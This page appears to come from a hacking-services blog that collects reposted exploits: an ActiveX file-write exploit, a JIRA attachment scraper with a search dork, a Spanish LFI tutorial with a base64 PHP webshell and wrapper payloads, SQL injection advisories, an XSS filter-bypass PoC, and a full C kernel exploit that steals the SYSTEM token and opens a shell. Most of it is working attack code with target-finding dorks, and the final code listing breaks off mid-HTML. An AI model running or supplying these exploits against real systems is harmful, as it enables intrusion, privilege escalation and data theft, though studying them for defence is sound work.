Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863117929

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/48483/info

CygniCon CyViewer ActiveX control is prone to a vulnerability caused by an insecure method.

Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges. 

<html>
<object classid='clsid:A6FC2988-16BE-4053-BE89-F562431FD6ED' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_create"
arg2="Data"
target.SaveData arg1 ,arg2
End Sub

</script>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/48484/info

Atlassian JIRA is prone to a security bypass vulnerability.

An attacker can exploit this issue to download arbitrary attachment files within the context of the affected application. 

<?php

/*If it's a https, you MUST especify it on the URL or it won't work.
Try using numbers that you get from your results in google otherwise
you will get a lot of 404*/


echo "\n#########################################################
###################
# \n#Attachment downloader by Ignacio Garrido\n#";

if ($argc != 4){echo "
#Usage: php Scuarji.php vulnsite FROM(NUMBER) TO(NUMBER)\n#
#Dork: inurl:/jira/secure/attachment/\n#
#Example: php Scuarji.php http://www.vulnsite/jira/secure/attachment/
1 12310371#
############################################################################\n";die;}

else{
echo "\n#Let's start!\n";
echo "#\n#Ign.sec@Gmail.com\n";
#\n############################################################################\n";}

$url2 = $argv[1];

if (substr($url2,0,7) != "http://" && substr($url2,0,8) != "https://")
{
$url = ("http://".$url2);
}
else
{
$url = $argv[1];
}

if ($argv[2] >= $argv[3])
{
echo "\n\n#The second number must be bigger than the first one\n";
die;
}

$numero = $argv[2];

for ($numero;$numero <= $argv[3];$numero++)
{
$head = get_headers("$url$numero/");

if (substr ($head[0],9,3) == "404")
{
echo "\n#File number $numero not found! (404)\n";
}
else{
$explodeo = explode("filename*=",$head[2]);
$explodeo2 = explode(";",$explodeo[1]);
$archivo = substr($explodeo2[0],7);

echo "\n#Downloading file: $archivo\n";
$file=file_get_contents("$url$numero/$archivo");
file_put_contents($archivo,$file);

}
}
echo "\n#All attachment downloaded correctly!\n";
die;

?>
HireHackking

PHP Wrappers

En el caso de que tratemos con archivos PHP, existe un concepto que son los llamados PHP Wrappers. Un wrapper es una especie de envoltura que le dice al Stream (secuencia, petición, entrada/salida de datos) como actuar.

Esta característica de PHP es muy útil en ataques como el LFI y el XXE, gracias a esto, podemos obtener alguna que otra ventaja que de otra forma no tendríamos.

El concepto de wrapper quedará más claro cuando lo veamos ahora.

Índice:

  • php://filter
  • zip://
  • data://
  • php://input
  • expect://
  • Referencias

php://filter

El Wrapper filter nos permite encodear el archivo que le especifiquemos, esto es muy útil, ya que nos permite poder leer archivos PHP que en otro caso, el navegador simplemente interpretaría directamente.

Por ejemplo, tenemos el siguiente archivo:

image 116

Como vemos, tiene una contraseña en un comentario. Pero si nosotros accedemos al archivo desde la web:

image 117

Solo vemos la salida del código interpretado 😥. Sin embargo, usando el wrapper filter, seremos capaces de leer el archivo PHP al completo.

Para probar el wrapper, he creado un LFI en un archivo index.php. Por lo que, en este LFI, el payload que introduciremos para hacer uso del wrapper y leer el archivo secret.php, será el siguiente:

  • php://filter/convert.base64-encode/resource=<archivo>
image 118

De esta forma, estamos leyendo el archivo secret.php pero en base64, por lo que si decodeamos esta salida:

image 119

Obtenemos el archivo al completo. Un detalle curioso sobre los wrappers es que podemos concatenar varios a través del uso de un pipe | o un slash /. Ejemplo:

image 120
image 121

Y obtenemos exactamente el mismo resultado.

Además de poder encodear en base64, podemos aplicar ROT13 con la siguiente cadena:

  • php://filter/read=string.rot13/resource=<archivo>

Aunque este en concreto no sirve para leer archivos PHP:

image 265

Pero si aplica para otro tipo de archivos:

image 266

En conclusión, referente a este wrapper, tenemos los dos siguientes payloads:

  • php://filter/convert.base64-encode/resource=<archivo>
  • php://filter/read=string.rot13/resource=<archivo>

zip://

El wrapper zip nos permite ejecutar un php que hayamos metido dentro de un archivo zip. Incluso no hace falta que el archivo zip tenga como extensión zip, sino que puede tener cualquiera.

Este wrapper no está instalado por defecto, pero se puede instalar con el siguiente comando:

  • sudo apt install phpX.Y-zip

Donde X e Y, es la versión PHP que tengamos instalada o a la que queramos instalarle esta característica.

Ejemplo de ejecución de webshell a través de este wrapper:

image 267

Payload:

  • zip://<archivo zip>%23<archivo php>

En <archivo zip>, si no se encontrase en el directorio actual, se le especificaría el directorio donde se encontrase el archivo y listo.

Nota: en caso de que el archivo PHP fuese una webshell o esperase algún parámetro, se le agregaría con un ampersand como vemos en la siguiente imagen.

image 268

E incluso cambiando la extensión del zip, seguirá funcionando:

image 269
image 270

data://

El wrapper data nos permite incluir datos externos, incluido código PHP. Este wrapper solo funciona si la opción allow_url_include está activada en la configuración de PHP (la opción equivalente a un Remote File Inclusion).

Ejecutar código PHP con este wrapper es bastante sencillo, podemos hacerlo de dos formas:

  • En texto plano
  • En base 64

En texto plano, simplemente tendríamos que usar el siguiente payload:

  • data:text/plain,<código PHP>

Ejemplo:

image

De cara a hacerlo usando base64, simplemente tendríamos que encodear el código PHP:

image 264

Y colocarlo en el wrapper tal que:

  • data://text/plain;base64,<código PHP en base64>
  • data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=

De esta forma, como estamos definiendo un parámetro para ejecutar comandos, el payload para por ejemplo ejecutar el comando id sería:

  • data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&cmd=id

Ejemplo:

image 263

php://input

Este wrapper es parecido al de arriba (data). Se puede usar para incluir código PHP. Su requisito al igual que el wrapper data es que la opción allow_url_include de la configuración de PHP debe de estar habilitada.

Con esto hecho, se podría ejecutar comandos mandando el código PHP en los datos de una petición POST. Ejemplo:

  • curl -s -X POST -d ‘<código PHP>’ ‘http://example.com/index.php?file=php://input’
image 262

En este caso, la salida del comando la podemos ver en la respuesta.

expect://

El wrapper expect no está instalado por defecto, pero en el caso de que lo esté, permite ejecutar directamente comandos de la siguiente forma:

  • expect://<comando>

Esto ocurre porque este wrapper da acceso a una PTY (pseudo-teletype), que en UNIX básicamente se refiere a una terminal. Da acceso tanto al STDIN, STDOUT como STDERR.

Conclusión PHP Wrappers

Como hemos podido ver, esta característica de PHP es muy útil en muchas ocasiones, ya que nos puede ayudar conseguir acciones que de una u otra forma no podríamos. Es bastante útil hacer uso de ellas cuando estamos ante vulnerabilidades como el Local File Inclusion (LFI) o el XML External Entity (XXE), o realmente en cualquier caso donde veamos que tenemos la capacidad de usarlas.

Referencias

  • What do pty and tty mean?
  • expect://
  • File Inclusion / Directory Traversal – HackTheBox Academy
HireHackking 
Document Title:
===============
Mangallam CMS - SQL Injection Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1421


Release Date:
=============
2015-01-26


Vulnerability Laboratory ID (VL-ID):
====================================
1421


Common Vulnerability Scoring System:
====================================
8.9


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote SQL-Injection web vulnerability in the official Mangallam Content Management System 2015-Q1.


Vulnerability Disclosure Timeline:
==================================
2015-01-26:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official Mangallam Content Management System 2015-Q1.
The sql vulnerability allows an attacker to inject sql commands to compromise the application & database management system.

The sql injection vulnerability is located in the `newsid` value of the vulnerable `news_view.php` application file. Remote attackers 
are able to inject own sql commands by  manipulation of the vulnerable newsid value in the `news_view.php` file. A successful attack 
requires to manipulate a GET method request with vulnerable `newsid` value to inject own sql commands. The injection is a classic 
order by sql injection that allows to compromise the web-application and connected database management system. The request method to 
inject own sql commands is GET and the vulnerability is located on the application-side of the service.

The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.9.
Exploitation of the application-side web vulnerability requires no privileged web-application user account and no user interaction.
Successful exploitation of the security vulnerability result in web-application and database management system compromise.

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] News

Vulnerable File(s):
				[+] news_view.php

Vulnerable Parameter(s):
				[+] newsid


Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Dork(s):
allinurl:news_view.php?newsid=    
title:Powered By Powered by Mangallam


PoC:
http://localhost:8080/news_view.php?newsid=-1'[REMOTE SQL-INJECTION VULNERABILITY!]--


Reference(s):
http://localhost:8080/news_view.php


Solution - Fix & Patch:
=======================
The remote vulnerability can be patched by usage of a prepared statement next to the newsid GET method request.
Restrict and filter the newsid value and disallow input of special chars. Prevent disaplaying of php errors by usage of the (0)error (php) function.



Security Risk:
==============
The security risk of the remote sql injection web vulnerability in the content management system is estimated as critical.


Credits & Authors:
==================
IranGuard Security Team - P0!s0nC0d3


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking

Barracuda Networks Cloud Series - Filter Bypass

HACKER · %s · %s

Document Title: =============== Barracuda Networks Cloud Series - Filter Bypass Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=754 Barracuda Networks Security ID (BNSEC): 731 Release Date: ============= 2015-01-19 Vulnerability Laboratory ID (VL-ID): ==================================== 754 Common Vulnerability Scoring System: ==================================== 4.5 Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a filter bypass vulnerability in the official Barracuda Cloud Series Products. Vulnerability Disclosure Timeline: ================================== 2015-01-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Barracuda Networks Product: Cloud Control Center 2014 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A filter bypass vulnerability has been discovered in the official Barracuda Networks Cloud Series Appliance Applications 2014-Q1. The filter bypass issue allows an attacker to bypass the secure filter validation of the service to execute malicious script codes. The barracuda filter blocks for example standard iframes, scripts and other invalid code context: The cloud service has a own exception-handling to parse or encode malicious injected web context. The mechanism filters the first request and sanitizes the output in every input field. During a pentest we injected a standard iframe to check and provoke the validation. The frame got blocked! In the next step the attacker splits (%20%20%20) the request and injects at the end an onload frame to an external malicious source. The second iframe with the onload alert executes the script codes after the validation encoded only the first script code tag. The second script code tag can bypass the applicance filter mechanism and executes in the web context of affected modules. The secure validation does not recognize a splitted request which results in client-side and application-side script code execution in the cloud series products. The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 4.5 (medium). Exploitation of the filter bypass vulnerability requires a low privileged application user account with restricted access and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of affected or connected module context. Vulnerable Request Method(s): [+] POST & GET Proof of Concept (PoC): ======================= The filter bypass web vulnerability can be exploited by local privileged user accounts and remote attackers with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: <iframe src=a>%20%20%20%20\"><iframe src=http://vuln-lab.com onload=alert("VL") < PoC: <script language=JavaScript>m='%3Ciframe%20src%3Da%3E%2520%2520%2520%2520%5C%22%3E%3Ciframe%20src%3Dhttp%3A//vuln-lab.com%20onload%3Dalert%28%22VL%22%29%20%3C';d=unescape(m);document.write(d);</script> Solution - Fix & Patch: ======================= The issue can be patched by a secure validation of the full message input body context of any input or request method attempt. Ensure that the validaton does not only encode the first injected script code since a empty char arrives. Filter all web context that runs through the requesting procedure and parse separatly to prevent script code injection attacks. Note: Barracuda Networks patched the vulnerability and acknowledged the researcher. Updates are available in Barracuda Labs and the Customer Service. Security Risk: ============== The security risk of the filter bypass web vulnerability in the barracuda cloud product series is estimated as medium. (CVSS 4.5) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking

VideoLAN VLC Media Player 2.1.5 - Write Access Violation

HACKER · %s · %s

Title : VLC Player 2.1.5 Write Access Violation Vulnerability Discoverer: Veysel HATAS (@muh4f1z) Web page : www.binarysniper.net Vendor : VideoLAN VLC Project Test: Windows XP SP3 Status: Fixed Severity : High CVE ID : CVE-2014-9598 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9598> NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598 OSVDB ID : 116451 <http://osvdb.org/show/osvdb/116451> VLC Ticket : 13390 <https://trac.videolan.org/vlc/ticket/13390> windbglog : windbglog.txt <https://trac.videolan.org/vlc/attachment/ticket/13390/windbglog.txt> Discovered : 24 November 2014 Reported : 26 December 2014 Published : 9 January 2015 Description : VLC Media Player contains a flaw that is triggered as user-supplied input is not properly sanitized when handling a specially crafted M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. # Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-poc.m2v # Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-windbglog.txt
HireHackking
/* Exploit Title - Comodo Backup Null Pointer Dereference Privilege Escalation Date - 23rd January 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - https://www.comodo.com Tested Version - 4.4.0.0 Driver Version - 1.0.0.957 - bdisk.sys Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1 OSVDB - http://www.osvdb.org/show/osvdb/112828 CVE ID - CVE-2014-9633 Vendor fix url - http://forums.comodo.com/news-announcements-feedback-cb/comodo-backup-44123-released-t107293.0.html Fixed version - 4.4.1.23 Fixed Driver Ver - 1.0.0.972 Note ---- Does not cleanly exit, had to use some leave instructions to get the command prompt. If you know of a better way please do let me know. Below in from Windows XP in IofCallDriver function. eax = 12h 804e37fe 8b7108 mov esi,dword ptr [ecx+8] <- control the null page as ecx = 00000000 804e3801 52 push edx 804e3802 51 push ecx 804e3803 ff548638 call dword ptr [esi+eax*4+38h] ds:0023:00000080=00000090 804e3807 5e pop esi 804e3808 c3 ret esi + eax*4 + 38h = 0 + 48 + 38 = 80h if ESI is null */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct // Windows 7 SP1 #define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct #define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct #define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct #define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc3 // ret }; BYTE token_steal_w7[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN 0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,W7_TOKEN,0x00,0x00,0x00, // mov [eax+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc9, // leave 0xc3 // ret }; BYTE ESInull[] = "\x00\x00\x00\x00"; BYTE RETaddr[] = "\x90\x00\x00\x00"; int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(&pi, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtAllocateVirtualMemory NtAllocateVirtualMemory; NTSTATUS allocstatus; LPVOID base_addr = (LPVOID)0x00000001; DWORD written; int rwresult; int size = BUFSIZE; HANDLE hDevice; unsigned char buffer[BUFSIZE]; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" COMODO Backup (bdisk.sys) Null Pointer Dereference EoP Exploit \n"); printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); sprintf(devhandle, "\\\\.\\%s", "bdisk"); NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory"); if (!NtAllocateVirtualMemory) { printf("[-] Unable to resolve NtAllocateVirtualMemory\n"); return -1; } printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory); printf("[+] Allocating memory at [0x%p]\n", base_addr); allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (allocstatus) { printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus); printf("Error : %d\n", GetLastError()); return -1; } printf("[+] NtAllocateVirtualMemory successful\n"); memset(buffer, 0x90, BUFSIZE); memcpy(buffer+0x00000007, ESInull, sizeof(ESInull)-1); memcpy(buffer+0x0000007f, RETaddr, sizeof(RETaddr)-1); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); memcpy(buffer+0x00000100, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); } else if (GetWindowsVersion() == 2) { printf("[i] Running Windows 7\n"); memcpy(buffer+0x00000100, token_steal_w7, sizeof(token_steal_w7)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7)); } else if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written); if (rwresult == 0) { printf("[-] An error occured while mapping writing memory: %d\n", GetLastError()); return -1; } printf("[+] WriteProcessMemory %d bytes written\n", written); printf("[~] Press any key to Exploit . . .\n"); getch(); hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } CloseHandle(hDevice); printf("[+] Spawning SYSTEM Shell\n"); spawnShell(); return 0; }
HireHackking

PHP Webquest 2.6 - SQL Injection

HACKER · %s · %s

# Exploit Title: sql injection # Google Dork: inurl:webquest/soporte_horizontal_w.php?id_actividad= # Date: [24/01/2015] # Exploit Author: [jord4nroo7] anonjo@aol.com # Vendor Homepage: [http://phpwebquest.org] # Software Link: [http://phpwebquest.org/?page_id=14] # Version: [phpwebquest-2.6] # Tested on: [windows 8.1] #Exploit: sql inhection found on phpwebquest script version 2.6 # #example http://localhost/phpwq/webquest/soporte_horizontal_w.php?id_actividad=184&id_pagina=1%27' #--------------------------- if ($_GET['id_actividad']!=''){ $id_actividad=$_GET['id_actividad'];--------->sqlinjection here }else{ $id_actividad='1500000'; } if ($_GET['id_pagina']!=''){ $id_pagina=$_GET['id_pagina']; }else{ $id_pagina='1'; $texto_actual=$texto_alternativo; $imagen_actual='../imagenes/no_imagen.gif'; } #---------------------------- <? session_cache_limiter('nocache,private'); session_start(); session_set_cookie_params(0, "/", $HTTP_SERVER_VARS["HTTP_HOST"], 0); include("../include/mysql.php"); include("../include/idioma.php"); $base=$mysql_db; $c=mysql_connect($mysql_server,$mysql_login,$mysql_pass); mysql_select_db ($base, $c); #para solucionar un problema que se plantea cuando los usuarios crean la actividad pero no crean páginas if ($_GET['id_actividad']!=''){ $id_actividad=$_GET['id_actividad']; }else{ $id_actividad='1500000'; } if ($_GET['id_pagina']!=''){ $id_pagina=$_GET['id_pagina']; }else{ $id_pagina='1'; $texto_actual=$texto_alternativo; $imagen_actual='../imagenes/no_imagen.gif'; } #echo "PAGINA DEL GET:".$id_pagina."<br>"; #echo "PAGINA DEL GET:".$id_pagina."<br>"; $sentencia= "SELECT * FROM actividad WHERE id_actividad=".$id_actividad; $resultado=mysql_query($sentencia); while($v=mysql_fetch_array($resultado)){ foreach ($v as $indice=>$valor){ if(!is_int($indice)){ # echo $indice.":".$valor."<br>"; $campo[$indice]=$valor; } } } $sentencia="select * from pagina where id_actividad=".$id_actividad." order by num_pagina asc"; $resultado=mysql_query($sentencia); $j=1; while($v=mysql_fetch_array($resultado)){ foreach ($v as $indice=>$valor){ if(!is_int($indice)){ #echo $indice.":".$valor."<br>"; $campo[$j][$indice]=$valor; } } $j++; } for ($cont=1; $cont<=5; $cont++){ if ($campo[$cont]['num_pagina']==$id_pagina){ $texto_actual=$campo[$cont]['texto']; $imagen_actual=$campo[$cont]['imagen']; } } $resta=0; $tamano_enlaces=$campo['font_size'] - $resta ; $tamano_titulo=$campo['font_size']; #echo $tamano_titulo; ?> <html> <head> <title>PHP Webquest</title> <!-- Webquest elaborada con PHP Webquest http://www.phpwebquest.org Programa elaborado por Antonio Temprano bajo Licencia GPL Puede ser utilizado gratuitamente por quien quiera hacerlo con fines educativos y con la obligación de no quitar estas líneas de código --> <style> table { font-family : <? echo $campo['font_face'];?>; font-size : <? echo $campo['font_size'];?>; font-weight : normal; color: <? echo $campo['color_texto_principal'];?>; } a { font-family : <? echo $campo['font_face'];?>; font-size : <? echo $campo['font_size'];?>; text-decoration: none; color: <? echo $campo['color_enlaces'];?>; font-weight : normal; } a:hover { position: relative; top: 1px; left: 1px; font-family : <? echo $campo['font_face'];?>; font-size : <? echo $campo['font_size'];?>; text-decoration: none; color: <? echo $campo['color_enlaces_resaltados'];?>; font-weight : normal; } div.phpwebquest { font-size : 7.5pt;} div.phpwebquest a:link { font-size : 7.5pt;} div.phpwebquest a:hover { font-size : 7.5pt;} div.phpwebquest a { font-size : 7.5pt;}; </style> </head> <body bgcolor="<? echo $campo['color_fondo_pagina'];?>"> <div align="center"> <table width="750" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_pagina'];?>"> <tr> <td><div align="center"> <table width="100%" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_texto'];?>"> <tr> <td><table width="100%" 